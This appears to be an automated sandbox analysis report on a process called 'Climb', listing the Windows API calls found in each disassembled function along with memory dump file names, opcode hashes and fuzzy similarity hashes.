                                                                                                                                                                          • Instruction Fuzzy Hash: 7C41C135A08508AFDB65DFACCC48FBD7BA5EB0A350F150224FA19EB2E0D770AD11DA50
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                          • Opcode ID: 1516d330f72a6f3454d87a584f5586246d057cfb35b9cde6c1dc22f1e78bafd7
                                                                                                                                                                          • Instruction ID: 1633d7a305ba1f662ff4b57902a58e8a37a3491bb8cccdce13196f644d0f03d9
                                                                                                                                                                          • Opcode Fuzzy Hash: 1516d330f72a6f3454d87a584f5586246d057cfb35b9cde6c1dc22f1e78bafd7
                                                                                                                                                                          • Instruction Fuzzy Hash: CC419D32B00210ABDF24DF78C981B5EB7E5EF89714B1545A9E615EB291DA31ED02CB80
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00A619E1
                                                                                                                                                                          • ScreenToClient.USER32(00000000,?), ref: 00A619FE
                                                                                                                                                                          • GetAsyncKeyState.USER32(00000001), ref: 00A61A23
                                                                                                                                                                          • GetAsyncKeyState.USER32(00000002), ref: 00A61A3D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4210589936-0
                                                                                                                                                                          • Opcode ID: b84566f6a316ecb7ed1f5669a5c15bae224cfc3ae9ba03ecf353ce3ccd33a883
                                                                                                                                                                          • Instruction ID: 3c200784283b55dfb4de63bdadfa093c9892c9bfabf36e5ce76db73d3a67dba1
                                                                                                                                                                          • Opcode Fuzzy Hash: b84566f6a316ecb7ed1f5669a5c15bae224cfc3ae9ba03ecf353ce3ccd33a883
                                                                                                                                                                          • Instruction Fuzzy Hash: 40415C76A0410ABBDF15DFA4C844AFEBB75FB15364F24831AF429A32D0D7306A54CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetInputState.USER32 ref: 00AD4310
                                                                                                                                                                          • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00AD4367
                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 00AD4390
                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 00AD439A
                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AD43AB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2256411358-0
                                                                                                                                                                          • Opcode ID: 869eea5c04530ae9f88979e8571f2c95231f9cccaf212503b68019214636b864
                                                                                                                                                                          • Instruction ID: a29bcc4dfd6e3fa53840d3198a0e8ce8c681287eec395ed1f2ee21b4c580dd1a
                                                                                                                                                                          • Opcode Fuzzy Hash: 869eea5c04530ae9f88979e8571f2c95231f9cccaf212503b68019214636b864
                                                                                                                                                                          • Instruction Fuzzy Hash: 39319A70544345DFEB39DB7CDC49BBA3BA8AB09304F14456BD4A3CB2A0E7749485CB15
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00AC2262
                                                                                                                                                                          • PostMessageW.USER32(00000001,00000201,00000001), ref: 00AC230E
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?), ref: 00AC2316
                                                                                                                                                                          • PostMessageW.USER32(00000001,00000202,00000000), ref: 00AC2327
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00AC232F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3382505437-0
                                                                                                                                                                          • Opcode ID: 7ec49db86483d31db687fe13448550e7515b46e3ec94d8675a706381c76a26e6
                                                                                                                                                                          • Instruction ID: f4fca497529217d70d2107dc0c2f47110d8ad729165e5f645c43c2109252eb12
                                                                                                                                                                          • Opcode Fuzzy Hash: 7ec49db86483d31db687fe13448550e7515b46e3ec94d8675a706381c76a26e6
                                                                                                                                                                          • Instruction Fuzzy Hash: 0231AD71900219EFDB14CFA8CD89BEE3BB6EB04315F114229FA25EB2D0C770A944DB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00ADCC63,00000000), ref: 00ADD97D
                                                                                                                                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 00ADD9B4
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,?,?,00ADCC63,00000000), ref: 00ADD9F9
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,00ADCC63,00000000), ref: 00ADDA0D
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,00ADCC63,00000000), ref: 00ADDA37
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3191363074-0
                                                                                                                                                                          • Opcode ID: 4b7bfa210a182234f25910702218f9675e0964168c9d4781f042cc6f375c7fea
                                                                                                                                                                          • Instruction ID: d8b4faa72eda443922d2ad21f0de28955fe81e158cfdb047c003fb38532fb316
                                                                                                                                                                          • Opcode Fuzzy Hash: 4b7bfa210a182234f25910702218f9675e0964168c9d4781f042cc6f375c7fea
                                                                                                                                                                          • Instruction Fuzzy Hash: 5B315971604205EFDB20DFA5D894EAFBBF8EB04350B10842EE546D6650D731EE45DB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00AF61E4
                                                                                                                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00AF623C
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AF624E
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AF6259
                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AF62B5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 763830540-0
                                                                                                                                                                          • Opcode ID: f0b33ae46eb854703ec3eac95966ad70c1734ab8fcba5dd55f2f840e330a8fd0
                                                                                                                                                                          • Instruction ID: ac12e051f0e03c697166d25f01f533d9b23a75c3c97e0ea7dd4c3b97804b3c75
                                                                                                                                                                          • Opcode Fuzzy Hash: f0b33ae46eb854703ec3eac95966ad70c1734ab8fcba5dd55f2f840e330a8fd0
                                                                                                                                                                          • Instruction Fuzzy Hash: 5A216D71D0021CAADB219FE4CC84AFEBBB9EF05324F104256FB25AA181D7709985CF50
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsWindow.USER32(00000000), ref: 00AE13AE
                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00AE13C5
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00AE1401
                                                                                                                                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 00AE140D
                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000003), ref: 00AE1445
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4156661090-0
                                                                                                                                                                          • Opcode ID: bce8e531a7e6cdea826c323e736108e011b1057c3f887a46420c4954c4d26263
                                                                                                                                                                          • Instruction ID: c5492e97ac9d399fd2f6e5636e961b9034d0e9a85e8976307fca10de5c8fdb18
                                                                                                                                                                          • Opcode Fuzzy Hash: bce8e531a7e6cdea826c323e736108e011b1057c3f887a46420c4954c4d26263
                                                                                                                                                                          • Instruction Fuzzy Hash: CB21A236600214AFD744EFA5CD84AAEBBF5EF48300B048439F84ADB761DB30AD01DB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00A9D146
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A9D169
                                                                                                                                                                            • Part of subcall function 00A93B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A86A79,?,0000015D,?,?,?,?,00A885B0,000000FF,00000000,?,?), ref: 00A93BC5
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A9D18F
                                                                                                                                                                          • _free.LIBCMT ref: 00A9D1A2
                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A9D1B1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 336800556-0
                                                                                                                                                                          • Opcode ID: 68d002f1e6ba702d556d63a9f1776a9f1d4c55af625f2c81d373e947441bfa82
                                                                                                                                                                          • Instruction ID: afd4c01c7fb5decd27a5401bda88891baecf79bcda05c0bc041aca07921c3a6c
                                                                                                                                                                          • Opcode Fuzzy Hash: 68d002f1e6ba702d556d63a9f1776a9f1d4c55af625f2c81d373e947441bfa82
                                                                                                                                                                          • Instruction Fuzzy Hash: 560171777016157F2B2167A69C88D7F6AAEDEC2BA13240329B905DA244DA608D42D1B0
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memcmp
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2931989736-0
                                                                                                                                                                          • Opcode ID: b3965993089371e1423f5f673c1d90a66fdcf4e8e3a2c9df2b1ee5dc304b3df1
                                                                                                                                                                          • Instruction ID: 5482c2899b6da832b233d650314b8bd00b4080c90a56f7f1f323c475792958e6
                                                                                                                                                                          • Opcode Fuzzy Hash: b3965993089371e1423f5f673c1d90a66fdcf4e8e3a2c9df2b1ee5dc304b3df1
                                                                                                                                                                          • Instruction Fuzzy Hash: 4301D8F1A103057BE714F7215D42FAB736DDE50398F02802DFD06AB281E761ED11C6A1
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(0000000A,?,?,00A8F64E,00A8545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00A93170
                                                                                                                                                                          • _free.LIBCMT ref: 00A931A5
                                                                                                                                                                          • _free.LIBCMT ref: 00A931CC
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00A931D9
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00A931E2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                          • Opcode ID: eb87d23d46636716527b36d62bf3ba2277a8c243f6f6a11aafb8a5d65a28d9a3
                                                                                                                                                                          • Instruction ID: 4e3d5bff0d469277a2de3cdb925c75082c70be1d52154b2b60830a46a8e1dae7
                                                                                                                                                                          • Opcode Fuzzy Hash: eb87d23d46636716527b36d62bf3ba2277a8c243f6f6a11aafb8a5d65a28d9a3
                                                                                                                                                                          • Instruction Fuzzy Hash: E301F473744A003B9F226774AD85E2B26FDAFC53B57310624F925E21B1EF21CB028261
                                                                                                                                                                          APIs
                                                                                                                                                                          • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AC0831,80070057,?,?,?,00AC0C4E), ref: 00AC091B
                                                                                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AC0831,80070057,?,?), ref: 00AC0936
                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AC0831,80070057,?,?), ref: 00AC0944
                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AC0831,80070057,?), ref: 00AC0954
                                                                                                                                                                          • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AC0831,80070057,?,?), ref: 00AC0960
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3897988419-0
                                                                                                                                                                          • Opcode ID: fc275c44a14f685be90123fcc63138483b0300d2a0687a5de38e820fa982442c
                                                                                                                                                                          • Instruction ID: 54363eb222f162b0077f9dc7161ff4d116cab53805b1b398b159fe2b63176c4f
                                                                                                                                                                          • Opcode Fuzzy Hash: fc275c44a14f685be90123fcc63138483b0300d2a0687a5de38e820fa982442c
                                                                                                                                                                          • Instruction Fuzzy Hash: FF018F76600204EFEB118FA9DC44FAA7ABEEB44792F150128F905E6211D771DD41DBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00ACF2AE
                                                                                                                                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 00ACF2BC
                                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 00ACF2C4
                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00ACF2CE
                                                                                                                                                                          • Sleep.KERNEL32 ref: 00ACF30A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2833360925-0
                                                                                                                                                                          • Opcode ID: 30802ca3d1f5023bae914aa2c30b90a9b0748d0b537d61e02b2b54c4e9a8ec3f
                                                                                                                                                                          • Instruction ID: 4bc95aab5d83efa645526f136f5b97f96109b30fdcb246c03aec8d04635ad5d4
                                                                                                                                                                          • Opcode Fuzzy Hash: 30802ca3d1f5023bae914aa2c30b90a9b0748d0b537d61e02b2b54c4e9a8ec3f
                                                                                                                                                                          • Instruction Fuzzy Hash: 63016975C01619EFCF00EFE4E849AEEBB7AFB08700F02056AE511B2290DB309554C7A5
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AC1A60
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,00AC14E7,?,?,?), ref: 00AC1A6C
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00AC14E7,?,?,?), ref: 00AC1A7B
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00AC14E7,?,?,?), ref: 00AC1A82
                                                                                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AC1A99
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 842720411-0
                                                                                                                                                                          • Opcode ID: eaf8e45ed6496e7a9b87b399fc154578ee2f8dd5ca9d10e5f23cfbf9cf6abe79
                                                                                                                                                                          • Instruction ID: 2c16febe7a697099fa29dd109b4f24df28270918c8676149601094db88d66e0a
                                                                                                                                                                          • Opcode Fuzzy Hash: eaf8e45ed6496e7a9b87b399fc154578ee2f8dd5ca9d10e5f23cfbf9cf6abe79
                                                                                                                                                                          • Instruction Fuzzy Hash: F5018CB9601205BFDB128FE4DC48E6A3B6EEF8A3A4B210418F945D7260DA31DC41DA60
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AC1916
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AC1922
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AC1931
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AC1938
                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AC194E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
